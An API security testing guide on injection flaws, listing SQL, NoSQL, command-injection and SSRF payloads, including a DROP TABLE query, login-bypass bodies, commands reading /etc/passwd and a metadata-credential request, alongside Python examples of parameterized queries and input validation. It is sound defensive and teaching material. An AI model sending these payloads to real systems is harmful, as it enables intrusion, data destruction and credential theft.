API Security API8 API10

Injection Attacks

Injection flaws occur when untrusted data is sent to an interpreter as part of a command or query. In APIs, this often manifests as SQL Injection, NoSQL Injection, Command Injection, or Server-Side Request Forgery (SSRF).

SQL Injection (SQLi)

Test all input vectors including query parameters, JSON body, and headers.

Query Parameters

Inject SQL syntax into URL parameters.

```http
GET /api/users?id=1'
GET /api/users?id=1"
GET /api/users?id=1 OR 1=1
GET /api/users?id=1; DROP TABLE users--
```

JSON Body

Inject into JSON fields.

```http
POST /api/login
Content-Type: application/json

{
  "username": "admin' --",
  "password": "password"
}
```

Headers

Inject into headers like User-Agent.

```http
User-Agent: ' OR 1=1--
```

Automated Testing

Use SQLMap for automated detection and exploitation.

```bash
sqlmap -u "https://api.target.com/api/users?id=1" --batch --banner
```
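The two payload families above (`admin' --` in a login body and `1 OR 1=1` in an `id` parameter) and the parameterized-query remediation, shown side by side. This is an added example written for this page, not code from the original; it uses an in-memory SQLite database with a constructed `users` table, and the function names are illustrative.

```python
import sqlite3


def make_db():
    """Constructed in-memory database so the example runs offline; not a real schema."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("admin", "s3cret"), ("alice", "hunter2")],
    )
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    # String formatting: the quote in  admin' --  closes the literal and the
    # rest of the WHERE clause (the password check) becomes an SQL comment.
    query = (
        f"SELECT id FROM users WHERE username = '{username}' "
        f"AND password = '{password}'"
    )
    return conn.execute(query).fetchone() is not None


def login_parameterized(conn, username, password):
    # Placeholders: the driver binds the values separately from the statement,
    # so quotes and comment markers are data, never SQL syntax.
    query = "SELECT id FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone() is not None


def users_by_id_vulnerable(conn, user_id):
    # Numeric parameter interpolated as text:  1 OR 1=1  returns every row.
    query = f"SELECT username FROM users WHERE id = {user_id}"
    return [row[0] for row in conn.execute(query)]


def users_by_id_safe(conn, user_id):
    # Type-check before the query: int("1 OR 1=1") raises ValueError, and a
    # genuine integer is bound as a parameter rather than spliced into SQL.
    user_id = int(user_id)
    query = "SELECT username FROM users WHERE id = ?"
    return [row[0] for row in conn.execute(query, (user_id,))]


if __name__ == "__main__":
    db = make_db()
    print("vulnerable login, payload admin' --:", login_vulnerable(db, "admin' --", "wrong"))
    print("parameterized login, same payload:", login_parameterized(db, "admin' --", "wrong"))
    print("vulnerable id lookup, payload 1 OR 1=1:", users_by_id_vulnerable(db, "1 OR 1=1"))
```

The type check in `users_by_id_safe` is the allowlist bullet from the remediation list applied to a numeric field: anything that is not a whole number never reaches the database.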

NoSQL Injection

NoSQL databases (like MongoDB) are also vulnerable, often through operator injection.

Basic Bypass

Operators such as `$ne` (not equal) injected through bracket-style query parameters turn the exact-match login check into a condition that matches any record, bypassing authentication.

```http
GET /api/users?username[$ne]=admin&password[$ne]=admin
```

JSON Body Injection

Inject operators into JSON objects.

```http
POST /api/login
Content-Type: application/json

{
  "username": {"$ne": null},
  "password": {"$ne": null}
}
```

Regex Injection

The `$regex` operator matches the field against a pattern, so the username check succeeds without knowing the exact value (here, any name beginning with `admin`).

```http
POST /api/login
Content-Type: application/json

{
  "username": {"$regex": "^admin"},
  "password": {"$ne": null}
}
```
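Why the `$ne` and `$regex` bodies above match, and the schema check that stops them. This is an added example written for this page, not code from the original: the constructed `USERS` list and `mongo_like_match` stand in for a MongoDB collection and the subset of filter semantics the payloads rely on, and the function names are illustrative. Frameworks that parse `username[$ne]=admin` from the query string into a nested object produce the same operator objects, so the same validation applies to that vector.

```python
import re

# Constructed user collection standing in for a MongoDB collection (not real data).
USERS = [
    {"username": "admin", "password": "s3cret"},
    {"username": "alice", "password": "hunter2"},
]

EXPECTED_FIELDS = ("username", "password")


def mongo_like_match(doc, flt):
    """Minimal stand-in for MongoDB filter evaluation: equality, $ne and $regex
    only, which is enough to show why operator objects match every document."""
    for field, cond in flt.items():
        value = doc.get(field)
        if isinstance(cond, dict):
            for op, arg in cond.items():
                if op == "$ne":
                    if value == arg:
                        return False
                elif op == "$regex":
                    if not isinstance(value, str) or re.search(arg, value) is None:
                        return False
                else:
                    raise ValueError(f"operator not modelled here: {op}")
        elif value != cond:
            return False
    return True


def find_users(flt):
    """Usernames of the documents matching the filter."""
    return [u["username"] for u in USERS if mongo_like_match(u, flt)]


def login_vulnerable(body):
    # The decoded JSON values are used as the filter as-is, so a client can
    # supply operator objects instead of strings.
    return find_users({"username": body["username"], "password": body["password"]})


def validate_login_body(body):
    """Accept only a flat object with exactly the expected keys and plain string
    values. Operator objects ({"$ne": null}), arrays, numbers, null, and extra or
    missing keys all raise ValueError before anything reaches the database."""
    if not isinstance(body, dict):
        raise ValueError("body must be a JSON object")
    if set(body) != set(EXPECTED_FIELDS):
        raise ValueError(f"expected exactly the fields {EXPECTED_FIELDS}")
    for key in EXPECTED_FIELDS:
        value = body[key]
        if not isinstance(value, str):
            raise ValueError(f"{key} must be a string, got {type(value).__name__}")
        if not 1 <= len(value) <= 256:
            raise ValueError(f"{key} has an invalid length")
    return {key: body[key] for key in EXPECTED_FIELDS}


def login_safe(body):
    # Validation yields plain strings, so the filter can only ever be an exact
    # match on both fields. (A real service compares a password hash; plaintext
    # is kept here only to keep the example short.)
    return find_users(validate_login_body(body))
```

The principle is the one in the remediation list: validate the shape and type of every field against what the endpoint expects, rather than trying to strip `$` from an arbitrary structure after the fact.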

Command Injection

If the API builds a system command from user input and hands it to a shell, shell metacharacters in that input are interpreted as part of the command.

Basic Injection

Use command separators like `;`, `&&`, `|`, or command substitution with `$(...)` and backticks.

```http
GET /api/ping?host=127.0.0.1; id
GET /api/ping?host=127.0.0.1 && cat /etc/passwd
GET /api/ping?host=127.0.0.1 | whoami
GET /api/ping?host=$(hostname)
GET /api/ping?host=`id`
```

Blind Injection

When command output is not returned in the response, use a time-based payload: a delayed response confirms that the injected command ran.

```http
GET /api/ping?host=127.0.0.1; sleep 10
```
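How the `/api/ping` payloads above reach a shell, and the two-part fix from the remediation list (strict allowlist validation of `host`, and no shell at all). This is an added example written for this page, not the original's code; the endpoint is assumed to call the system `ping` utility, and the hostname grammar and function names are the author's choices for illustration.

```python
import ipaddress
import re
import subprocess

# Hostname grammar (RFC 1123 labels): letters, digits and hyphens, no leading
# or trailing hyphen, so a valid value can never start with "-" and be taken
# as an option by ping.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_HOSTNAME_RE = re.compile(rf"(?:{_LABEL}\.)*{_LABEL}")


def vulnerable_ping_command(host):
    """The string a shell=True call would hand to /bin/sh: everything after the
    address, including separators and $(...), is parsed as shell syntax."""
    return f"ping -c 1 {host}"


def validate_host(host):
    """Return host if it is an IPv4/IPv6 literal or a well-formed hostname;
    raise ValueError for anything else (spaces, ;, |, &, $, backticks, ...)."""
    if not isinstance(host, str) or not 1 <= len(host) <= 253:
        raise ValueError("host must be a string of 1 to 253 characters")
    try:
        return str(ipaddress.ip_address(host))
    except ValueError:
        pass
    if _HOSTNAME_RE.fullmatch(host) is None:
        raise ValueError(f"invalid host: {host!r}")
    return host


def safe_ping_command(host):
    """argv for subprocess without a shell: each element is exactly one
    argument to ping, and nothing is re-parsed for separators or substitutions."""
    return ["ping", "-c", "1", validate_host(host)]


def run_ping(host, timeout=15):
    """Execute the validated command (not exercised by the tests)."""
    return subprocess.run(safe_ping_command(host), capture_output=True,
                          text=True, timeout=timeout)


if __name__ == "__main__":
    for candidate in ["127.0.0.1", "api.example.com", "127.0.0.1; id", "$(hostname)"]:
        try:
            print(candidate, "->", safe_ping_command(candidate))
        except ValueError as exc:
            print(candidate, "-> rejected:", exc)
```

Dropping the shell removes the separator and substitution vectors; the grammar check is still needed because an argument that starts with `-` would otherwise be parsed by `ping` itself as an option. The `timeout` also bounds the blind, time-based variant: a request cannot hold a worker for as long as an injected `sleep` would.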

Server-Side Request Forgery (SSRF)

SSRF allows an attacker to induce the server to make requests to unintended locations.

Internal Scanning

Target internal IP addresses or localhost.

```http
POST /api/webhook
Content-Type: application/json

{
  "url": "http://localhost:80"
}
```

```http
POST /api/scan
Content-Type: application/json

{
  "target": "192.168.1.1"
}
```

Cloud Metadata

Target cloud metadata services to steal credentials.

```http
POST /api/webhook
Content-Type: application/json

{
  "url": "http://169.254.169.254/latest/meta-data/"
}
```

File Scheme

Try to read local files using the `file://` scheme.

```http
POST /api/render
Content-Type: application/json

{
  "url": "file:///etc/passwd"
}
```
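A URL validator for the webhook, scan and render endpoints above that implements the "allowlist domains" remediation bullet and rejects each of the three SSRF payload classes (internal addresses, the cloud metadata endpoint, and `file://`). This is an added example written for this page, not the original's code; the allowlist contents, the `resolver` hook (used so the tests run offline) and the function names are assumptions.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {None, 80, 443}


def default_resolver(hostname):
    """All addresses the system resolver returns for hostname."""
    return {info[4][0] for info in socket.getaddrinfo(hostname, None)}


def is_public_address(ip):
    """True only for globally routable unicast addresses. Loopback, RFC 1918,
    link-local (which covers the 169.254.169.254 metadata endpoint), multicast,
    reserved and unspecified addresses all return False."""
    addr = ipaddress.ip_address(ip)
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped  # ::ffff:169.254.169.254 is judged as IPv4
    return not (addr.is_private or addr.is_loopback or addr.is_link_local
                or addr.is_multicast or addr.is_reserved or addr.is_unspecified)


def validate_fetch_url(url, allowed_hosts, resolver=default_resolver):
    """Return (hostname, sorted resolved IPs) for a URL the service may fetch,
    or raise ValueError. allowed_hosts is the operator's allowlist, assumed to
    be a set of lowercase hostnames (never IP literals or internal names)."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        raise ValueError(f"scheme not allowed: {scheme!r}")  # file://, gopher://, ...
    if parts.username is not None or parts.password is not None:
        raise ValueError("credentials in the URL are not allowed")
    if parts.port not in ALLOWED_PORTS:
        raise ValueError(f"port not allowed: {parts.port}")
    host = (parts.hostname or "").lower().rstrip(".")
    if not host:
        raise ValueError("URL has no host")
    if host not in allowed_hosts:
        # Literal IPs, localhost and RFC 1918 targets fail here regardless of
        # how they are written, because only approved names are in the set.
        raise ValueError(f"host not in allowlist: {host!r}")
    try:
        ips = resolver(host)
    except socket.gaierror as exc:
        raise ValueError(f"cannot resolve {host!r}") from exc
    non_public = sorted(ip for ip in ips if not is_public_address(ip))
    if not ips or non_public:
        # An allowlisted name that resolves to an internal address (misconfigured
        # record, DNS rebinding) is still refused.
        raise ValueError(f"{host!r} resolves to non-public address(es): {non_public}")
    return host, sorted(ips)


if __name__ == "__main__":
    allow = {"hooks.example.com"}  # constructed allowlist
    for candidate in ["https://hooks.example.com/notify", "file:///etc/passwd",
                      "http://169.254.169.254/latest/meta-data/", "http://localhost:80"]:
        try:
            print(candidate, "->", validate_fetch_url(candidate, allow))
        except ValueError as exc:
            print(candidate, "-> rejected:", exc)
```

Two checks outside this function complete the control: the HTTP client must connect to the addresses that were validated (pinning them, or re-running `is_public_address` on the socket's peer address) so that a DNS answer cannot change between check and use, and any redirect the target returns must go through `validate_fetch_url` again before it is followed.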

Remediation

Defense Strategies

  • Use parameterized queries (Prepared Statements) for all database access.
  • Validate and sanitize all user input against a strict allowlist.
  • Avoid using `eval()`, `exec()`, or `system()` functions with user input.
  • Implement strict URL validation for webhooks and external fetches (allowlist domains).
  • Run API services with least privilege (non-root user).